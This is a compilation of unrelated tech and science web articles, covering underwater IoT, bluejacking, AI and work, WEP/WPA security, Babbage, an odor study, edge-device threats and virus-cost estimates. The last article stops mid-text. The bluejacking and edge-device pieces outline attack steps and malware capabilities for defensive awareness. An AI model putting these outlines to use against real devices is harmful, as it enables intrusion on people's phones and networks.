The benefits of IoT (the Internet of Things) to a number of industries are obvious – mainly the ability to remotely monitor machines in real-time while ensuring safety and anticipating breakdowns. However, there are technical challenges when it comes to monitoring and communicating underwater which is where IoT Underwater comes into play.
IoT Underwater is a system made of unmanned vehicles that scour the sea while communicating with underwater sensors and sending the information to networks on the surface.
This information can be used for:
- Detecting early signs of tsunamis
- Surveying shipwrecks and crash sites
- Monitoring the health of marine animals
- Tracking salinity and temperature changes
This kind of IoT, which senses and transmits data through water, would be important in the protection of oceans and lakes. The technology could alert oil rigs and engineers to problems below the surface, warning them that something could be wrong before a catastrophe occurs and persists for years.
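As a rough illustration of how a surface gateway might act on relayed sensor readings, the sketch below flags values that deviate sharply from a recent baseline. The window size, threshold, and pressure figures are all invented for the example; real leak-detection models are far more sophisticated.

```python
from statistics import mean, stdev

def flag_anomalies(readings, window=10, threshold=3.0):
    """Flag readings that deviate sharply from the recent baseline.

    `readings` is a time-ordered list of sensor values (e.g., pipeline
    pressure in PSI) relayed from underwater nodes to a surface gateway.
    A reading more than `threshold` standard deviations from the mean of
    the preceding `window` samples is treated as a possible leak or fault.
    """
    alerts = []
    for i in range(window, len(readings)):
        baseline = readings[i - window:i]
        mu, sigma = mean(baseline), stdev(baseline)
        if sigma and abs(readings[i] - mu) > threshold * sigma:
            alerts.append((i, readings[i]))
    return alerts

# Example: steady pressure with one sudden drop, as a leak might cause.
pressure = [1500.0 + d for d in (0.3, -0.2, 0.1, 0.4, -0.5,
                                 0.2, -0.1, 0.3, -0.3, 0.1)] + [1380.0]
print(flag_anomalies(pressure))   # -> [(10, 1380.0)]
```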
There are still challenges that scientists and engineers are facing when looking at the reality of IoT underwater, such as signal transmission, background noise, sensors come at a high cost, and the environment is ever-changing.
Still, looking to the future, companies are already seeking solutions to these challenges. Underwater robots and prototypes are being created to work through these roadblocks and test how communications are relayed from underwater to onshore devices.
It’s a step in the right direction and a direction that industries, such as oil & gas, should consider when looking at innovative and safe ways to protect oceans and humans.
Powerful Data Capture Apps for Inspectors, Exploration or Production Teams
Safety Inspections • Pipeline Inspections • Gemba Walks • Platform Audits • Certifications and Training •
Pumpjack Inspections • Work Orders • Time and Attendance • ISO Certifications •
Dispatch • Licensing • and more...
Source: https://www.alphasoftware.com/blog/how-the-oil-industry-can-benefit-from-iot-technology
What bluejacking is and how to defend against it
Bluejacking refers to an attack targeting Bluetooth-enabled devices like smartphones, laptops, and smartwatches. The typical approach involves sending unsolicited messages to the nearby targets within the Bluetooth range. At first glance, bluejacking might seem irritating but harmless in the end. However, attackers can send malicious content, links, or files with the intent to hack and damage. So, this Bluetooth hacking can transmit threatening messages, images, or promotional content.
What is bluejacking?
Bluejacking is a technique of sending anonymous, unwanted messages to users. Such attacks typically occur in crowded public places, where hackers detect and connect to Bluetooth-enabled devices in close proximity. The technique exploits the element of surprise and hopes users will react on the spur of the moment.
Luckily, bluejacking is not highly popular anymore. Some pranksters still try to intimidate their victims by delivering odd or alarming messages.
Initially, hackers would send messages, but smartphone capabilities have opened venues for images, sounds, and videos.
How does bluejacking happen?
Bluejacking happens when attackers find targets nearby the areas they are in. Such targeting might be specific, with hackers coming to select locations. However, the victim screening might be random, picking those with enabled Bluetooth settings.
The maliciousness of such unsolicited messages depends on their content. They may be humorous, aimed simply at irritating, or they can be more deceptive, mimicking banking or other official services.
The typical sequence of bluejacking is as follows:
- Culprits go to a select location, preferably one with many people.
- Attackers search for Bluetooth-enabled devices nearby.
- They then try to pair their device with the target.
- Some targeted devices can require authentication, such as providing a password. A common way attackers bypass this is with brute-force attacks.
- Hackers can now send unsolicited messages to the victim if a connection gets established.
Considering the vulnerability of Bluetooth, attackers can engage in many Bluetooth-targeting techniques. Bluejacking is one of them, but bluebugging and bluesnarfing are also possible exploits.
Comparing bluejacking, bluesnarfing, and bluebugging
Bluetooth, like any technology, is not bulletproof. From vulnerabilities to other hacking tactics, Bluetooth faces many threats. Bluejacking is only one of them, and users might confuse it with other similar strategies.
- Bluejacking. Hackers connect to nearby Bluetooth devices and send unsolicited messages. It can be harmless unless the transmitted content has malicious components like fake links, comparable to smishing.
- Bluebugging. It is a technique for targeting cell phones. Essentially, hackers exploit a flaw (a bluebug) to access a device. After that, it is possible to do much more harm than with bluejacking. Attackers can initiate phone calls, send text messages, connect to the internet, and read contacts.
- Bluesnarfing. While bluejacking delivers unwanted messages to targeted devices, bluesnarfing aims to extract information. Hackers can access various device components through a Bluetooth connection, like contacts, calendars, photo galleries, and more. Thus, this Bluetooth attack can be devastating as it facilitates data theft.
How dangerous can bluejacking be?
There is usually no harm in receiving unexpected messages. Nevertheless, there are scenarios where bluejacking can turn dangerous. Besides transmitting malicious links or files, let’s consider an example of a dangerous bluejacking attack.
Suppose you have received a bizarre message on a wearable device (say, a smartwatch). Accidentally, you have responded to the message, confirming the initiated request. However, the attacker had actually sent a request to synchronize your daily tracking data. Without even realizing it, you could have validated such a message.
Protect your device from bluejacking
It is relatively easy to avoid bluejacking. The following tips will help you protect your device from Bluetooth-targeting attacks and other illegal acts.
- Disable Bluetooth if not in active use. Keep Bluetooth turned off if your device does not connect to other gadgets. This change will not only evade attacks against Bluetooth. For instance, it can also minimize location tracking done through Bluetooth.
- Make your Bluetooth undiscoverable. When you need to have your Bluetooth enabled, set it as hidden. This will prevent other Bluetooth devices from recognizing your device. For instance, you may need to turn off open detection on some devices (see the sketch after this list).
- Be wary of messages and emails. Besides bluejacking, there are other ways to deliver social engineering scams. Users should know the basics of recognizing deceptive messages. The main rule is never to open files or follow links found in emails or texts.
- Lock your device. Having a password-protected device is essential. Thus, pick the best lock for your smartphone, tablet, or computer.
- Enable two-factor authentication. Passwords are not foolproof. From simple combinations to leaked passwords, various scenarios can lead to account takeover. Therefore, enable 2FA on all services you use.
- Avoid public Wi-Fi. Free hotspots can be a blessing, especially if you run low on cellular data. However, experts discourage you from connecting to any free Wi-Fi network you encounter. If you are an avid user of such networks, the next tip can be a gamechanger to your experience.
- Encrypt internet traffic. Public Wi-Fi frequently lacks encryption, which means that your online activities are susceptible to snooping. A Virtual Private Network encrypts your connection and stops entities from learning your digital habits. It is the go-to tool for becoming more private and secure online.
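As a concrete example of the "make your Bluetooth undiscoverable" advice above, the sketch below shells out to BlueZ's `bluetoothctl` on Linux to stop the device from advertising itself. This is an assumption-laden sketch: it presumes `bluetoothctl` is installed and that these subcommands are supported by your BlueZ version; on phones and most other platforms the equivalent is simply a settings toggle.

```python
import subprocess

def harden_bluetooth():
    """Ask BlueZ (Linux) to stop advertising this device to nearby scanners.

    Command names may vary across BlueZ versions, so treat this as a
    sketch rather than a portable tool.
    """
    for cmd in (["bluetoothctl", "discoverable", "off"],
                ["bluetoothctl", "pairable", "off"]):
        subprocess.run(cmd, check=False)  # ignore failures on systems without BlueZ

if __name__ == "__main__":
    harden_bluetooth()
```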
Source: https://atlasvpn.com/blog/what-bluejacking-is-and-how-to-defend-against-it
Artificial Intelligence and the Future of Work and Business
One of the most prominent themes in science fiction is robots taking over. But while this may seem a fantasy, job security and business viability are genuine fears affecting individuals and organizations across a wide spectrum.
In this respect, discussions surrounding artificial intelligence (AI) come to light, sparking mixed responses. If you’re confused about what AI is, and how it impacts you as an employee or small business owner, you have come to the right place!
In today’s blog post, we cut to the chase, avoiding complex terms and telling you the nitty-gritty of what this technology is and what the future holds.
Artificial Intelligence 101
In the most basic terms, AI is where technology mimics human thinking. As our world becomes smarter and more connected, machines are also beginning to sense, learn, react, and adapt to real-life situations, creating amazing interactions between people and computers.
The two core concepts of AI are:
Machine Learning (ML)
ML is a computational method that enables machines to learn and perform specific functions without being explicitly programmed to do so.
Deep Learning (DL)

This is a branch of ML that uses neural network models to process and make sense of large amounts of data, accelerating tasks like speech recognition.
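Since both concepts come down to learning from examples rather than hand-written rules, a toy sketch may make the contrast with ordinary programming clearer. This example uses scikit-learn (our choice, not something specified here), and the feature values are fabricated.

```python
# A toy illustration of "learning from data rather than explicit rules":
# the model infers the boundary between two classes from labeled examples.
from sklearn.tree import DecisionTreeClassifier

# Hypothetical feature rows: [hours_of_use, error_count]
X = [[1, 0], [2, 1], [8, 9], [9, 7], [3, 1], [7, 8]]
y = [0, 0, 1, 1, 0, 1]          # 0 = healthy device, 1 = failing device

model = DecisionTreeClassifier().fit(X, y)
print(model.predict([[8, 8], [2, 0]]))   # expected: [1 0]
```

No one told the model where to draw the line between healthy and failing devices; it inferred that boundary from the labeled rows.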
It’s crucial that we also know what AI is not. Again, talking about science fiction, AI is not like SkyNet or HAL. It’s not ‘alive’. Even the most interactive and seemingly spontaneous tasks performed by a machine are programmed into it. An AI can only think and set tasks for itself in a very limited context.
Indeed, some characterizations of AI and its impact are grossly exaggerated. What we do know so far is that AI can help you automate everyday tasks, and help you make sense of large amounts of data quickly. And this is where its implications on work and business begin.
What AI Means for the Future of Business
Considering its nature, AI has tremendous potential in all kinds of industries. Here are a few examples:
AI can help doctors make timely and more accurate diagnoses, which lead to timely treatments and improved outcomes.
Self-driving cars are a possibility as they can learn from data of millions of cars, improving safety.
AI can benefit finance in many ways: it can help organizations and experts sift through large volumes of data and notice trends and patterns that enable better and faster decision-making. Banks can also analyze spending patterns and catch unusual activity to crack down on fraud before it occurs.
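The fraud-detection claim maps naturally onto anomaly detection. Below is a hedged sketch using scikit-learn's `IsolationForest`; the spending figures are invented, and a production system would use far richer features than a single daily amount.

```python
from sklearn.ensemble import IsolationForest

# Hypothetical daily spending amounts for one account (in dollars).
history = [[42], [55], [38], [61], [47], [50], [44], [58], [49], [53]]

detector = IsolationForest(contamination=0.1, random_state=0).fit(history)

# 1 marks an inlier, -1 an outlier; the $4800 charge should be flagged.
print(detector.predict([[52], [4800]]))
```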
So, AI adoption has far-reaching implications for all industries. Even farmers can benefit by tracking weather and soil conditions in real-time, leading to greater yields, even in unpredictable climates.
And while AI adoption is far from reaching its potential, the majority of businesses experimenting with Artificial Intelligence report tangible benefits. Automation helps businesses improve efficiencies and accuracy across departments such as sales, customer support, and even human resources. This helps justify investment in AI, even for small businesses, because it will ultimately lower your business costs by removing inefficiencies.
And as more business processes are automated, the workforce becomes free to focus on tasks that require creativity and critical thinking. This brings us to the next point.
What about Jobs?
In many areas, AI is matching human capabilities, which leads to concern about job security. Will AI change the workforce in the future?
It is hard to say at this point. What seems likely is that many jobs involving repetitive tasks will become redundant.
But this is not an altogether bad thing as AI helps the human workforce to concentrate on the valuable tasks that fully utilize their skills. Among other things, this leads to a greater level of professional fulfillment, and surveys do show that AI has helped in employee retention, even if on a limited scale.
Moreover, as AI brings new capabilities to businesses, many new jobs will be created in the process as well. What businesses need is to engage employees at the earliest stages of AI development so that they can use it to boost their own skills and become better at their jobs.
And companies that do this sooner rather than later are more likely to benefit in the long run.
At Cleartech Group, we have gathered a group of experts who have knowledge and expertise in managing your IT needs and who are committed to staying on top of current trends. Contact us at (978)466-1938 or at www.cleartechgroup.com
Source: https://www.cleartechgroup.com/artificial-intelligence-and-the-future-of-work-and-business/
The security built into Wi-Fi is better than no security at all—but not by much. Standards bodies are at work, though, on a framework that will free IT managers from some of the heavy lifting they have to do to get WLANs up to enterprise code.
During the past two years, the IEEE has been working on the 802.11i security standard. This standard is designed to address known WEP (Wired Equivalent Privacy) vulnerabilities and provide significant enhancements to 802.11-based equipment. 802.11i calls for a better authentication scheme—via 802.1x—and two new encryption protocols that will replace WEP.
The IEEE-ratified 802.1x, which provides a framework for stronger user authentication and a centralized security management model, comprises three components: the supplicant, a client machine trying to access the wireless LAN; the authenticator, a Layer 2 device that provides the physical port to the network (such as an access point or a switch); and the authentication server, which verifies user credentials and provides key management.
802.1x supports the use of an authentication server or a database service, including a Remote Authentication Dial-In User Service, or RADIUS, server; an LDAP directory; a Windows NT Domain; or Active Directory.
The upper-layer authentication protocol used by 802.1x components is called EAP (Extensible Authentication Protocol). EAP is a challenge-response protocol that can be run over secured transport mechanisms such as TLS (Transport Layer Security) and TTLS (Tunneled TLS).
EAP-TLS is a certificate-based protocol supported natively in Windows XP. Both the client and the authentication server require certificates to be configured during initial implementation.
EAP-TTLS can be used to provide a password-based authentication mechanism. In EAP-TTLS implementations, only the authentication server is required to have a certificate.
Cisco Systems Inc.'s proprietary LEAP (Lightweight EAP) was the first password-based authentication scheme available for WLANs. Cisco's Aironet AP supports LEAP and EAP-TLS.
Although 802.1x will help fix the static WEP key security issues, it is strictly an authentication standard and does not address the encryption weaknesses found in WEP. The Wi-Fi Alliance, working with the IEEE, has devised a security standard called WPA (Wi-Fi Protected Access) that will reach the product certification stage this year.
WPA uses 802.1x for authentication but adds a stronger encryption element from the 802.11i draft called TKIP (Temporal Key Integrity Protocol). TKIP addresses all the known deficiencies in the WEP algorithms but maintains backward compatibility with legacy 802.11 hardware.
TKIP works like a "wrapper" around WEP, adding multiple enhancements to the WEP cipher engine. TKIP extends the IV (initialization vector) from 24 bits in WEP to 48 bits to address replay attacks. The IV is combined with the key to encrypt the data in a packet.
Extending the IV to 48 bits greatly increases the number of possible per-packet keys and protects against replay attacks. Some vendor implementations of WEP use the same IV for all packets for the lifetime of the connection or rotate the IV in a predictable manner. TKIP uses better sequencing rules to ensure that an IV cannot be reused even if intruders get hold of it.
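The sequencing idea is simple enough to sketch: a receiver remembers the highest sequence counter seen and drops anything that does not strictly increase. The class below is a toy illustration of that rule, not the actual 802.11i receiver logic.

```python
class ReplayGuard:
    """Drop packets whose sequence counter does not strictly increase.

    TKIP carries a 48-bit sequence counter (the extended IV); a receiver
    that remembers the highest counter seen so far can discard replayed
    traffic. This is the idea in miniature only.
    """
    MAX_TSC = 2**48 - 1

    def __init__(self):
        self.last_tsc = -1

    def accept(self, tsc: int) -> bool:
        if not 0 <= tsc <= self.MAX_TSC or tsc <= self.last_tsc:
            return False          # replayed or out-of-order: drop
        self.last_tsc = tsc
        return True

guard = ReplayGuard()
print(guard.accept(100), guard.accept(101), guard.accept(101))  # True True False
```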
WPA also adds Message Integrity Code, a cryptographic checksum that protects against forgery attacks.
The transmitter of a packet computes a cryptographic checksum (the MIC) and appends it to the packet before encrypting and transmitting it. The recipient decrypts the packet and verifies the MIC before accepting the packet. If the MIC doesn't match, the packet is dropped.
Having the MIC ensures that modified packets will be dropped and attackers won't be able to forge messages to fool network devices into authenticating them.
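The verify-then-drop pattern can be sketched in a few lines. Note that TKIP's real MIC uses the lightweight Michael algorithm; the HMAC-SHA256 stand-in below is our substitution, chosen only because it ships in Python's standard library, and the 8-byte truncation and key are illustrative.

```python
import hashlib
import hmac
from typing import Optional

def seal(key: bytes, payload: bytes) -> bytes:
    """Append a MIC so the receiver can detect tampering."""
    mic = hmac.new(key, payload, hashlib.sha256).digest()[:8]
    return payload + mic

def open_packet(key: bytes, packet: bytes) -> Optional[bytes]:
    """Recompute the MIC; return the payload only if it matches, else drop."""
    payload, mic = packet[:-8], packet[-8:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()[:8]
    return payload if hmac.compare_digest(mic, expected) else None

key = b"shared-session-key"
pkt = seal(key, b"hello")
print(open_packet(key, pkt))                       # b'hello'
print(open_packet(key, pkt[:-8] + b"forged!!"))    # None (forgery dropped)
```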
Per-packet key mixing of the IV prevents weak key attacks. A new key derivation scheme helps to minimize the amount of information gained on a successful forgery attempt.
With TKIP implemented on both the access point and all client devices, a different key is generated to encrypt each new packet. This will ensure that hackers with exploited IVs cannot predict the base WEP key.
Although WPA brings a welcome boost to WLAN security, many view it as a temporary fix because future 802.11 equipment will likely use the Counter Mode with CBC-MAC Protocol, or CCMP, which is also a part of the 802.11i draft. CCMP uses AES (Advanced Encryption Standard) to provide even stronger encryption. However, AES requires a good amount of processing power—which likely means upgrading hardware to see optimal performance—and is not designed for backward compatibility.
Certification of the new security enhancements in the 802.11i standard is just starting, and Wi-Fi products supporting WPA will make their way slowly to market this year.
Technical Analyst Francis Chu can be reached at [email protected].
- Security of the WEP algorithm www.isaac.cs.berkeley.edu/isaac/wep-faq.html
- 802.11i draft and call for interest on link security for IEEE 802 networks grouper.ieee.org/groups/802/linksec/meetings/MeetingsMaterial/Nov02/halasz_sec_1_1102.pdf
- 802.1x: port-based network access control www.ieee802.org/1/pages/802.1x.html
- Open-source implementation of 802.1x open1x.sourceforge.net/
Source: https://www.eweek.com/security/standards-will-fill-holes-in-wep-authentication-and-encryption/
The Science Museum in London has agreed to plans which will see the sketches and notes made by Charles Babbage, the grandfather of computing, digitised and made publicly available.
The Museum's announcement comes after campaigners looking to create a fully-functional implementation of Babbage's Analytic Engine asked the Museum for access to the files located in its archives.
Designed in the 1830s, the Analytical Engine was to be Babbage's most ambitious creation: building on the work carried out on the Difference Engine, it upgraded what was little more than an early calculator to a Turing-complete computer with punch-card input, mechanical processing, and output to printer, plotter, or bell.
Sadly, while Babbage's designs are believed to be sound, the complexity of the project proved too much for the technology of his time. At the time of his death in 1871, only a small fraction of the Analytical Engine had been constructed.
Many are now working to create a simulation of the Analytical Engine using Babbage's original notes and plans, as a precursor to building a working implementation using modern construction methods. Efforts by John Graham-Cumming and the Science Museum's curator of computing, Doron Swade, to make the notes available to all will be invaluable in this process.
Sadly, it won't all be plain sailing. "There are some complete plans, they are just not totally complete. There will be a degree of interpretation," Graham-Cumming admitted to the BBC.
The project's members hope to complete the rebuild by 2021, to commemorate the 150th anniversary of Babbage's death.
Source: https://www.itproportal.com/2011/09/21/babbages-notes-be-digitised-all/
TestOut Launches New Course and Certification to Teach IT Essentials
There are dueling — and somewhat overlapping — definitions of digital literacy in the information technology (IT) realm. The more traditional take is that digital literacy describes an individual's ability to find, evaluate, and communicate information via typing and other input media on various digital platforms. (Finding and evaluating information on digital platforms? Much trickier than it used to be.)
The newer, emerging definition describes an individual's ability to use and understand the most common hardware and software tools: computers, printers, word processing programs, and so forth. (The overlap is in skills development. For example, you'll need to develop your ability to input information, most likely by typing, either way.)
The second definition is most likely the one best embodied by Digital Literacy Pro, a new product being launched this week by IT courseware and certification provider TestOut. The core audience is anyone who needs to develop basic fluency with IT tools, programs, and platforms. That includes everyone from middle school students to senior citizens.
It's worth pointing out, incidentally, that the market is getting younger all the time: Lots of school districts in the United States, for example, will be passing out Chromebooks to elementary school students starting as early as this week.
The list of IT topics covered by Digital Literacy Pro is impressive and includes, but is not limited to, the following: keyboarding, hardware, operating systems and file systems, intro to applications, word processing, spreadsheets, presentations, common applications, online and cloud collaboration, the basics of internet and social media, mobile technology, and programming fundamentals. There's even some exploration of common IT career paths.
TestOut has a longstanding reputation in IT education circles for its robust simulation technology. Most lessons include simulations of common IT tasks that walk learners through everything from networking a printer to navigating common operating systems. This has the notable advantage of letting students learn by doing while not putting expensive hardware and software at risk.
It also means that TestOut courses, including Digital Literacy Pro, are available online, providing the anywhere, anywhen — that internet connectivity is available — study convenience that students and educators have increasingly come to expect. TestOut courses are also unique in that the cost of certification, and the certification exam, are included in the purchase price. First they teach skills, then you get the cert.
However you define it, digital literacy is increasingly important across the employment spectrum, and increasingly essential to navigating daily life outside the workplace. In the United States, the National Center for Education Statistics reported in 2018 that 74 percent of U.S. adults use a computer for work, while 81 percent of U.S. adults use a computer in everyday life.
If those statistics sound intimidating, then Digital Literacy Pro could be the "prepared to encounter life" solution that parents, children, and workers are looking for.
|
<urn:uuid:67ff3f3a-5d54-4c9a-8fad-13ee7e930e77>
|
CC-MAIN-2022-40
|
https://www.gocertify.com/articles/testout-launches-new-course-and-certification-to-teach-it-essentials
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00047.warc.gz
|
en
| 0.946353 | 595 | 2.75 | 3 |
Odors surround us, providing cues about many aspects of personal identity, including health status. Now, research from the Monell Center extends the scope and significance of personal odors as a source of information about an individual’s health.
A new paper in the open-access journal Scientific Reports reveals that the bodily odors of otherwise healthy animals sharing an environment with sick animals become like the odors of the sick animals.
The findings suggest that odor cues associated with sickness can cause biological changes in healthy individuals, potentially impacting social contacts and perhaps even patterns of disease spread.
“Exposure to the odors of sick individuals may trigger protective or preparative responses in their social partners to minimize the risk of impending infection,” said study lead author Stephanie Gervasi, Ph.D., a Monell chemical ecologist.
Previous Monell work had demonstrated that inflammation leads to bodily odor changes, suggesting that immune-activated odors might signal the presence of disease risk (or possible contagion) to other members of a species.
In the current study, the researchers injected mice with lipopolysaccharide (LPS), a non-infectious bacterial toxin that causes inflammation, activation of the immune system, and other symptoms associated with sickness.
The LPS-injected “sick” animals were then housed in the same cages as healthy animals.
Results from bioassays using “sniffer” mice trained to differentiate between urine odors from LPS-injected and healthy animals indicated that healthy partners of sick animals smelled more like sick, as compared to healthy, animals.
A parallel analysis using statistical predictive modeling of urinary odor compounds identified via analytical chemistry confirmed the behavioral bioassay findings:
models were more likely to classify odor compounds from healthy mice as sick rather than healthy when the healthy mice were co-housed with sick animals.
Similar results were obtained when the study was repeated with sick and healthy animals that were physically separated by a perforated partition.
The partition allowed odors to circulate, strongly suggesting that the changes in the healthy mice were not the result of physical odor transfer.
The combined findings reveal that body odors of healthy animals can change in the presence of odor-based sickness signals.
“This work shows not only that odors signal disease but that they can have strong effects on individuals that detect them,” said Monell behavioral biologist Gary Beauchamp, Ph.D., one of the paper’s senior authors.
“This is a remarkable transfer of information via olfaction that specifically alters physiology and could play a role in disease transfer among individuals in many species.”
Bruce Kimball, Ph.D., a research chemist from the USDA National Wildlife Research Center Research (NWRC) stationed at Monell and also a senior author, notes that the study’s findings may be particularly relevant to wildlife populations.
“This knowledge that healthy animals can emit odors associated with sickness may inform our efforts to use bodily odors to understand how pathogens are transmitted within a population of animals,” he said.
More information: Scientific Reports (2018). www.nature.com/articles/s41598-018-32619-4
Journal reference: Scientific Reports
Provided by: Monell Chemical Senses Center
|
<urn:uuid:0403de52-2572-462e-b10c-8d7f14b0e865>
|
CC-MAIN-2022-40
|
https://debuglies.com/2018/09/24/odors-as-a-source-of-information-about-an-individuals-health/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00247.warc.gz
|
en
| 0.935991 | 694 | 3.390625 | 3 |
Importance of Securing Edge Devices
Over the last few years, devices deployed at the boundaries of interconnected networks, also known as edge devices (such as routers and network-attached storage, or NAS, devices), have become the target of sophisticated malicious activity.
Growing Threat to Edge Devices
The discovery by researchers at Cisco Talos of the malicious software (malware) called “VPNFilter” highlighted the growing threat to edge devices. As of May 2018, researchers at Cisco Talos estimated that at least 500,000 home and office routers and network-attached storage (NAS) devices in at least 54 countries were infected with the VPNFilter malware. The known devices affected by VPNFilter were Linksys, MikroTik, NETGEAR and TP-Link networking equipment in the small and home office (SOHO) space, as well as QNAP network-attached storage (NAS) devices.
VPNFilter is particularly dangerous malware: it persists on the infected device even after a reboot; it works as an intelligence-collection platform capable of file collection, command execution and data exfiltration; and it possesses a self-destruct capability that overwrites a critical portion of the infected device's firmware and reboots the device, potentially cutting off internet access for hundreds of thousands of victims worldwide.
Researchers at Cisco Talos said that they’re unsure how VPNFilter infected close to half a million devices but said that most devices targeted were particularly older versions, have known public exploits or default credentials that make compromise relatively easy. VPNFilter was ultimately degraded due to the coordinated actions between law enforcementand cybersecurity companies, including the seizing of the domain that was part of the malware’s command-and-control infrastructure.
According to the nonprofit organization Cyber Threat Alliance (CTA), the VPNFilter activity prompted CTA members to take a closer look at the growing threat to edge devices. “The scale of such a threat would be tremendous, as there are millions of devices that fall within these categories,” CTA said.
Why Are Edge Devices Vulnerable to Cyberattacks?
Unlike computers and servers, which usually receive regular attention from system administrators, edge devices, although vital to the operation of many organizations, are given very little or no oversight. Edge devices include network edge devices (routers, switches, wide area network (WAN) devices, VPN concentrators); network security devices (firewalls); network monitoring devices (network-based intrusion detection systems, or NIDS); and customer premise devices (integrated access devices).
In the paper “Cyber Treat Alliance Joint Analysis: Securing Edge Devices”, CTA cited default configuration settings and backdoors as some of the reasons why edge devices are prone to cyberattacks.
Default Configuration Settings
Edge devices are typically shipped with pre-configured default settings, for instance factory login details, leaving users with the task of manually changing these details to make the devices more secure. Many users, however, never get around to changing these factory login details, leaving the devices vulnerable to attack.
A case in point for default configuration settings is Mirai, malware which at its height infected hundreds of thousands of devices, many of them routers. These infected devices were then controlled by the attackers as a botnet, an army of infected devices used for malicious activities such as distributed denial-of-service (DDoS) attacks. The original Mirai malware is linked to the DDoS attacks on the website of cybersecurity journalist Brian Krebs. When one of the Mirai authors publicly published the source code of the malware, it was revealed that the malware had successfully infected hundreds of thousands of devices by using 61 factory or default login details.
A backdoor is an undocumented way of gaining access to a computer system without going through the system’s customary security mechanisms. Vendors of edge devices install backdoors in these devices for administrative purposes to gain data on performance, maintenance or reliability. In some cases, backdoors are installed to aid law enforcement investigations. These backdoors, however, could be used by malicious actors to gain access to the device and the network.
A case in point for backdoors involves Barracuda's hardware devices, including its web filter, web application firewall and SSL VPN, which in November 2012 were all discovered by a security researcher at Vienna, Austria-based SEC Consult Vulnerability Lab to have undocumented backdoor accounts that allow for remote access.
In addition to default configuration settings and backdoors, the CTA cited two other reasons why these devices are vulnerable to cyberattacks: edge devices typically have no intrusion prevention systems or anti-malware solutions in place, and their near-100% uptime delays patching.
As a consequence of these vulnerabilities, the CTA said that compromised edge devices have been used by malicious actors as a platform for further attacks: from the illicit use of computing power for cryptocurrency mining to monitoring traffic, establishing persistent access to target networks or systems, exfiltrating information, and launching offensive cyberattacks on networks to "deny, degrade, disrupt, or destroy information or infrastructure".
Cybersecurity Best Practices
Malware such as VPNFilter and Mirai, backdoors, the absence of anti-malware and anti-intrusion solutions, and the high uptime of edge devices all mean that protecting these devices demands the same diligence as protecting your organization's computers and servers.
As recommended by the CTA, here are some cybersecurity best practices in order to protect your organization’s edge devices from becoming the target of sophisticated malicious activity:
- Practice network segmentation.
- Ensure all factory login details are updated during the installation process and during every update.
- Install the latest security updates of all edge devices as timely as possible.
- Regularly review configurations of networking devices.
- Limit connections to the management interface to only trusted, secure hosts.
- Ensure that all communication between edge devices is encrypted.
- Regularly monitor the behavior of network edge devices.
- Buy edge devices only from trusted suppliers.
Your computer network might be vulnerable if you are using outdated devices or software. Call today or email to book a consultation, and our IT and security experts will be happy to help identify and address the vulnerabilities.
|
<urn:uuid:444efcbb-7dd4-4225-8495-1f0ac76e8f32>
|
CC-MAIN-2022-40
|
https://www.genx.ca/importance-of-securing-edge-devices
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00247.warc.gz
|
en
| 0.929581 | 1,296 | 2.703125 | 3 |
In some places, technology is turning school inside-out, with homework in school and lectures at home, delivered through iPads or other tablets. The Washington Post highlighted Stacey Roshan’s class, saying the philosophy of the so-called “flipped” classroom is that teachers can spend more time in the classroom with students who need help. This way, students can work to solve problems with guidance instead of suffering on their own to do homework outside of school.
Before the classroom was flipped, Roshan told the news source that her AP calculus class was pretty hard for some kids. Many couldn’t quite grasp the problems on their own and weren’t getting enough time with the teacher.
“My AP calc class was a really anxious environment,” Roshan said to the Post. “It was weird trying to get through way too much material with not enough time. It was exactly the opposite of what I was looking for when I got into teaching … [flipping] would create an environment where students could really work together. It would let me change the dynamic and bring that compassion back into the classroom.”
One student from Roshan’s 11th grade class, Brooke Gutschick, said she watches a video made by her teacher about four nights a week, according to the Post story. Each video is 20 to 30 minutes long, so much shorter than the average lecture would be in class. In class, Gutschick works with other students and the teacher, no longer having to struggle on her own.
“There is a lot more support with this and it’s a lot easier to learn,” Gutschick said. “You don’t get stressed out about what you are doing.”
In a piece for The Daily Riff, teachers Jonathan Bergmann and Aaron Sams said one great benefit of flipping a classroom is that it helps increase the student-teacher interaction time. The role of the teacher essentially changes to learning coach, so there is more time spent talking with kids and less time spent simply lecturing a group of kids who may or may not be up to speed with what is happening in class.
“Since the role of the teacher has changed, to more of a tutor than a deliverer of content, we have the privilege of observing students interact with each other,” the teachers said. “As we roam around the class, we notice the students developing their own collaborative groups. Students are helping each other learn instead of relying on the teacher as the sole disseminator of knowledge.”
What do you think of the new classroom flipping trend? Is there any type of classroom computer or software you think would be very useful for this? Let us know!
|
<urn:uuid:23344f02-7283-4b83-a35a-16b68e59320d>
|
CC-MAIN-2022-40
|
https://www.faronics.com/news/blog/teachers-flipping-for-technology-in-the-classroom
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00247.warc.gz
|
en
| 0.976027 | 574 | 3.03125 | 3 |
http://www.theregister.co.uk/content/56/23707.html
By John Leyden
Posted: 16/01/2002 at 17:33 GMT

Computer Economics has published its assessment of the damage worldwide caused by malicious code attacks in 2001 - the figure comes in at a whopping $13.2 billion. This is 23 per cent less than 2000, the year of the Love Bug, when damages from viruses were estimated at $17.1bn. In 1999 the cost to the world was $12.1 billion, Computer Economics says.

The research firm has totted up the damage wreaked by viruses each year since 1995. But the results are controversial. Critics in the antivirus industry dismiss Computer Economics' assessment of the damage caused by the combined effects of Nimda ($635 million), Code Red variants ($2.62 billion), SirCam ($1.15 billion) et al last year as a "guesstimate". They argue that it's hard to calculate the number of infected systems and the total damage caused during a virus outbreak, partly because costs will vary widely by company. Patching systems is, after all, a core part of the work of most sysadmins.

Michael Erbschloe, vice president of research at Computer Economics, angrily rejected criticisms of its methodology and said its work helped firms decide how to defend against viruses. Erbschloe said Computer Economics does "everything we can to get an accurate number and great lengths to determine what the hit rate is". The $13.2 billion figure on the cost of infections in 2001 is "not an audit" but it is "accurate", although Erbschloe declined to say just how accurate it was.

Methodology

